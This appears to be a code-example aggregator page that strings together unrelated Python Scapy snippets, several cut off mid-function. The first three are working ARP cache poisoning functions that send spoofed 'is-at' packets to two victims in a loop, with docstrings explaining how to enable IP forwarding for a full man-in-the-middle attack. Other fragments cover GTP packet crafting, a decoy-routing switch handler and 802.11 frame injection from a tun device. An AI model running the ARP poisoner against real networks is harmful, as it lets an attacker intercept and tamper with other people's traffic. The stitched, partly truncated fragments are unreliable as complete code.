示例#1
0
def cmd_arpoison(t1, t2, verbose):
    """ARP cache poison"""

    conf.verb = False

    mac1 = getmacbyip(t1)
    mac2 = getmacbyip(t2)

    pkt1 = Ether(dst=mac1) / ARP(op="is-at", psrc=t2, pdst=t1, hwdst=mac1)
    pkt2 = Ether(dst=mac2) / ARP(op="is-at", psrc=t1, pdst=t2, hwdst=mac2)

    try:
        while 1:
            sendp(pkt1)
            sendp(pkt2)

            if verbose:
                pkt1.show2()
                pkt2.show2()
            else:
                print(pkt1.summary())
                print(pkt2.summary())

            time.sleep(1)

    except KeyboardInterrupt:
        pass
def cmd_arp_poison(victim1, victim2, iface, verbose):
    """Send ARP 'is-at' packets to each victim, poisoning their
    ARP tables for send the traffic to your system.

    Note: If you want a full working Man In The Middle attack, you need
    to enable the packet forwarding on your operating system to act like a
    router. You can do that using:

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    Example:

    \b
    # habu.arpoison 192.168.0.1 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    ...
    """

    conf.verb = False

    if iface:
        iface = search_iface(iface)
        if iface:
            conf.iface = iface['name']
        else:
            logging.error(
                'Interface {} not found. Use habu.interfaces to show valid network interfaces'
                .format(iface))
            return False

    mac1 = getmacbyip(victim1)
    mac2 = getmacbyip(victim2)

    pkt1 = Ether(dst=mac1) / ARP(
        op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
    pkt2 = Ether(dst=mac2) / ARP(
        op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)

    try:
        while 1:
            sendp(pkt1)
            sendp(pkt2)

            if verbose:
                pkt1.show2()
                pkt2.show2()
            else:
                print(pkt1.summary())
                print(pkt2.summary())

            time.sleep(1)

    except KeyboardInterrupt:
        pass
示例#3
0
def cmd_arp_poison(victim1, victim2, iface, verbose):
    """Send ARP 'is-at' packets to each victim, poisoning their
    ARP tables for send the traffic to your system.

    Note: If you want a full working Man In The Middle attack, you need
    to enable the packet forwarding on your operating system to act like a
    router. You can do that using:

    # echo 1 > /proc/sys/net/ipv4/ip_forward

    Example:

    \b
    # habu.arpoison 192.168.0.1 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
    Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
    ...
    """

    conf.verb = False

    if iface:
        conf.iface = iface

    mac1 = getmacbyip(victim1)
    mac2 = getmacbyip(victim2)

    pkt1 = Ether(dst=mac1)/ARP(op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
    pkt2 = Ether(dst=mac2)/ARP(op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)

    try:
        while 1:
            sendp(pkt1)
            sendp(pkt2)

            if verbose:
                pkt1.show2()
                pkt2.show2()
            else:
                print(pkt1.summary())
                print(pkt2.summary())

            time.sleep(1)

    except KeyboardInterrupt:
        pass
示例#4
0
        def pkt_callback(pkt):
            try:
                pkt = Ether(pkt)
            except Exception as e:
                self.exception(e)

            if pcap_writer is not None:
                pcap_writer.write(pkt)

            if print_summary:
                self.log(pkt.summary())
def main():

    if len(sys.argv) < 2:
        print 'pass 2 arguments: <destination> "<message>"'
        exit(1)

    iface = "eth1"

    print "sending on interface %s" % (iface)
    pkt = Ether(src='00:15:5d:00:00:00', dst='00:15:5d:00:00:03') / IPv6(
        src="fc00::1", dst="fc00::4") / IPv6ExtHdrRouting(
            segleft=2, type=4, addresses=[
                "fc00::4", "fc00::101", "fc00::100"
            ]) / UDP(sport=64515, dport=2152) / GTP_U_Header(
                TEID=32, Reserved=0, E=1) / dl_pdu_session(
                    gtp_ext=133, QoSID=14) / IPv6(
                        src="fc00::1", dst="fc00::2") / UDP(
                            dport=80, sport=35000) / sys.argv[1]
    pkt.show2()
    pkt.summary()
    sendp(pkt, iface=iface, verbose=False)
示例#6
0
def process_cpu_packet(packet):
    '''
    Given packet from client switch, update table with sequence number offset.
    '''
    # Validate packet
    p_str = str(packet)
    # 0-7   : preamble1
    # 8     : reason
    # 9-16  : preamble2
    # 17-20 : tag_value
    # 21-   : data packet (TCP)
    if p_str[:8] != '\x00' * 8 or p_str[8] != '\xab' or p_str[
            9:17] != '\x00' * 8:
        vprint('Packet discarded')
        return

    ip_hdr = None
    tcp_hdr = None
    tag = 0
    try:
        tag = struct.unpack('!I', p_str[17:21])[0]
        p = Ether(p_str[21:])
        ip_hdr = p['IP']
        tcp_hdr = p['TCP']
    except Exception as e:
        vprint(e)
        return

    # Compute the difference
    diff = tag - tcp_hdr.seq

    # Don't reprocess packet
    seen_lock.acquire()
    if (ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport) in seen:
        seen_lock.release()
        vprint('already saw packet')
        return
    seen[(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport)] = diff
    seen_lock.release()

    vprintf('initial seqNo: %d\ttag: %d\n' % (tcp_hdr.seq, tag))
    vprint('Packet received')
    vprint(p.summary())

    add_to_table(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport, diff)

    # Send the packet back to the switch to forward
    new_p = p_str[:8] + '\xac' + p_str[21:]
    sendp(new_p, iface=args.interface, verbose=args.verbose)
示例#7
0
try:
    while 1:
        r = select([f, s], [], [])[0]

        # frame from /dev/net/tun
        if f in r:

            # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
            buf = os.read(f, 1526)
            eth_rcvd_frame = Ether(buf[4:])

            if DEBUG:
                os.write(1, "Received from %s\n" % ifname)
                if VERB:
                    os.write(1, "%s\n" % eth_rcvd_frame.summary())

# Prepare Dot11 frame for injection
            dot11_sent_frame = RadioTap() / Dot11(
                type="Data",
                FCfield="from-DS",
                addr1=eth_rcvd_frame.getlayer(Ether).dst,
                addr2=BSSID)
            # It doesn't seem possible to set tuntap interface MAC address
            # when we create it, so we set source MAC here
            if not HAS_SMAC:
                dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
            else:
                dot11_sent_frame.addr3 = SMAC
            if WEP:
                dot11_sent_frame.FCfield |= 0x40
示例#8
0
def handle_parse_covert(p_str):
    '''
    Given string packet, read the covert destination and send it back to
    the switch.
    '''
    ip_hdr = None
    tcp_hdr = None
    try:
        p = Ether(p_str[9:])
        ip_hdr = p[IP]
        tcp_hdr = p[TCP]
    except Exception as e:
        vprint(e)

    # Don't reprocess packet
    params = (ip_hdr.src, tcp_hdr.sport, ip_hdr.dst, tcp_hdr.dport)
    if params not in tcp_options:
        return

    vprint('Packet received')
    vprint(p.summary())

    # Look up the covert destination's IP address
    payload = p[TCP].payload
    abs_addr = ''
    try:
        # Request line should be of the form
        # "GET http://www.example.com/ HTTP/1.1"
        abs_addr = str(payload).strip().split()[1]
    except Exception as e:
        vprint(e)
        return
    url = urlparse(abs_addr)
    covert_ip = ''
    try:
        covert_ip = socket.gethostbyname(url.hostname)
    except Exception as e:
        vprintf('Failed to lookup host %s:\n%s\n' % (url.hostname, e))
        return

    covert_port = url.port if url.port is not None else DEFAULT_PORT

    # Update dict with info
    k = (covert_ip, covert_port, args.switch_addr, tcp_hdr.sport)
    seqack_base_lock.acquire()
    if k in seqack_base:
        seqack_base_lock.release()
        return
    seqack_base[k] = (tcp_hdr.seq, tcp_hdr.ack, ip_hdr.src, tcp_hdr.sport,
                      ip_hdr.dst, tcp_hdr.dport)
    seqack_base_lock.release()
    vprint('Decoded covert %s:%d' % (covert_ip, covert_port))

    update_decoy_mapping_table(ip_hdr.src, tcp_hdr.sport, ip_hdr.dst,
                               tcp_hdr.dport, covert_ip, covert_port)

    # Send packet back to switch. Use hacky solution to avoid reprocessing
    # this packet.
    new_p = p_str[:8] + '\x00' + p_str[9:]
    sendp(new_p, iface=args.interface, verbose=args.verbose)

    # Create the initial SYN packet for the connection to the covert
    # destination and send it back to the switch.
    covert_syn = Ether(src=args.switch_mac)
    covert_syn = covert_syn / IP(src=args.switch_addr, dst=covert_ip)
    covert_syn = covert_syn / TCP(sport=tcp_hdr.sport,
                                  dport=covert_port,
                                  flags=SYN_FLAGS,
                                  options=tcp_options[params],
                                  seq=tcp_hdr.seq)
    sendp(covert_syn, iface=args.interface, verbose=args.verbose)
示例#9
0
try:
    while 1:
        r = select([f,s],[],[])[0]

	# frame from /dev/net/tun
	if f in r:

	    # tuntap frame max. size is 1522 (ethernet, see RFC3580) + 4
	    buf = os.read(f,1526)
            eth_rcvd_frame=Ether(buf[4:])

	    if DEBUG:
	        os.write(1,"Received from %s\n" % ifname)
		if VERB:
		    os.write(1,"%s\n" % eth_rcvd_frame.summary())
	    
	# Prepare Dot11 frame for injection
	    dot11_sent_frame = RadioTap()/Dot11(
		type = "Data",
		FCfield = "from-DS",
		addr1 = eth_rcvd_frame.getlayer(Ether).dst,
		addr2 = BSSID)
	# It doesn't seem possible to set tuntap interface MAC address
	# when we create it, so we set source MAC here
	    if not HAS_SMAC:
	        dot11_sent_frame.addr3 = eth_rcvd_frame.getlayer(Ether).src
	    else:
		dot11_sent_frame.addr3 = SMAC
	    if WEP:
		dot11_sent_frame.FCfield |= 0x40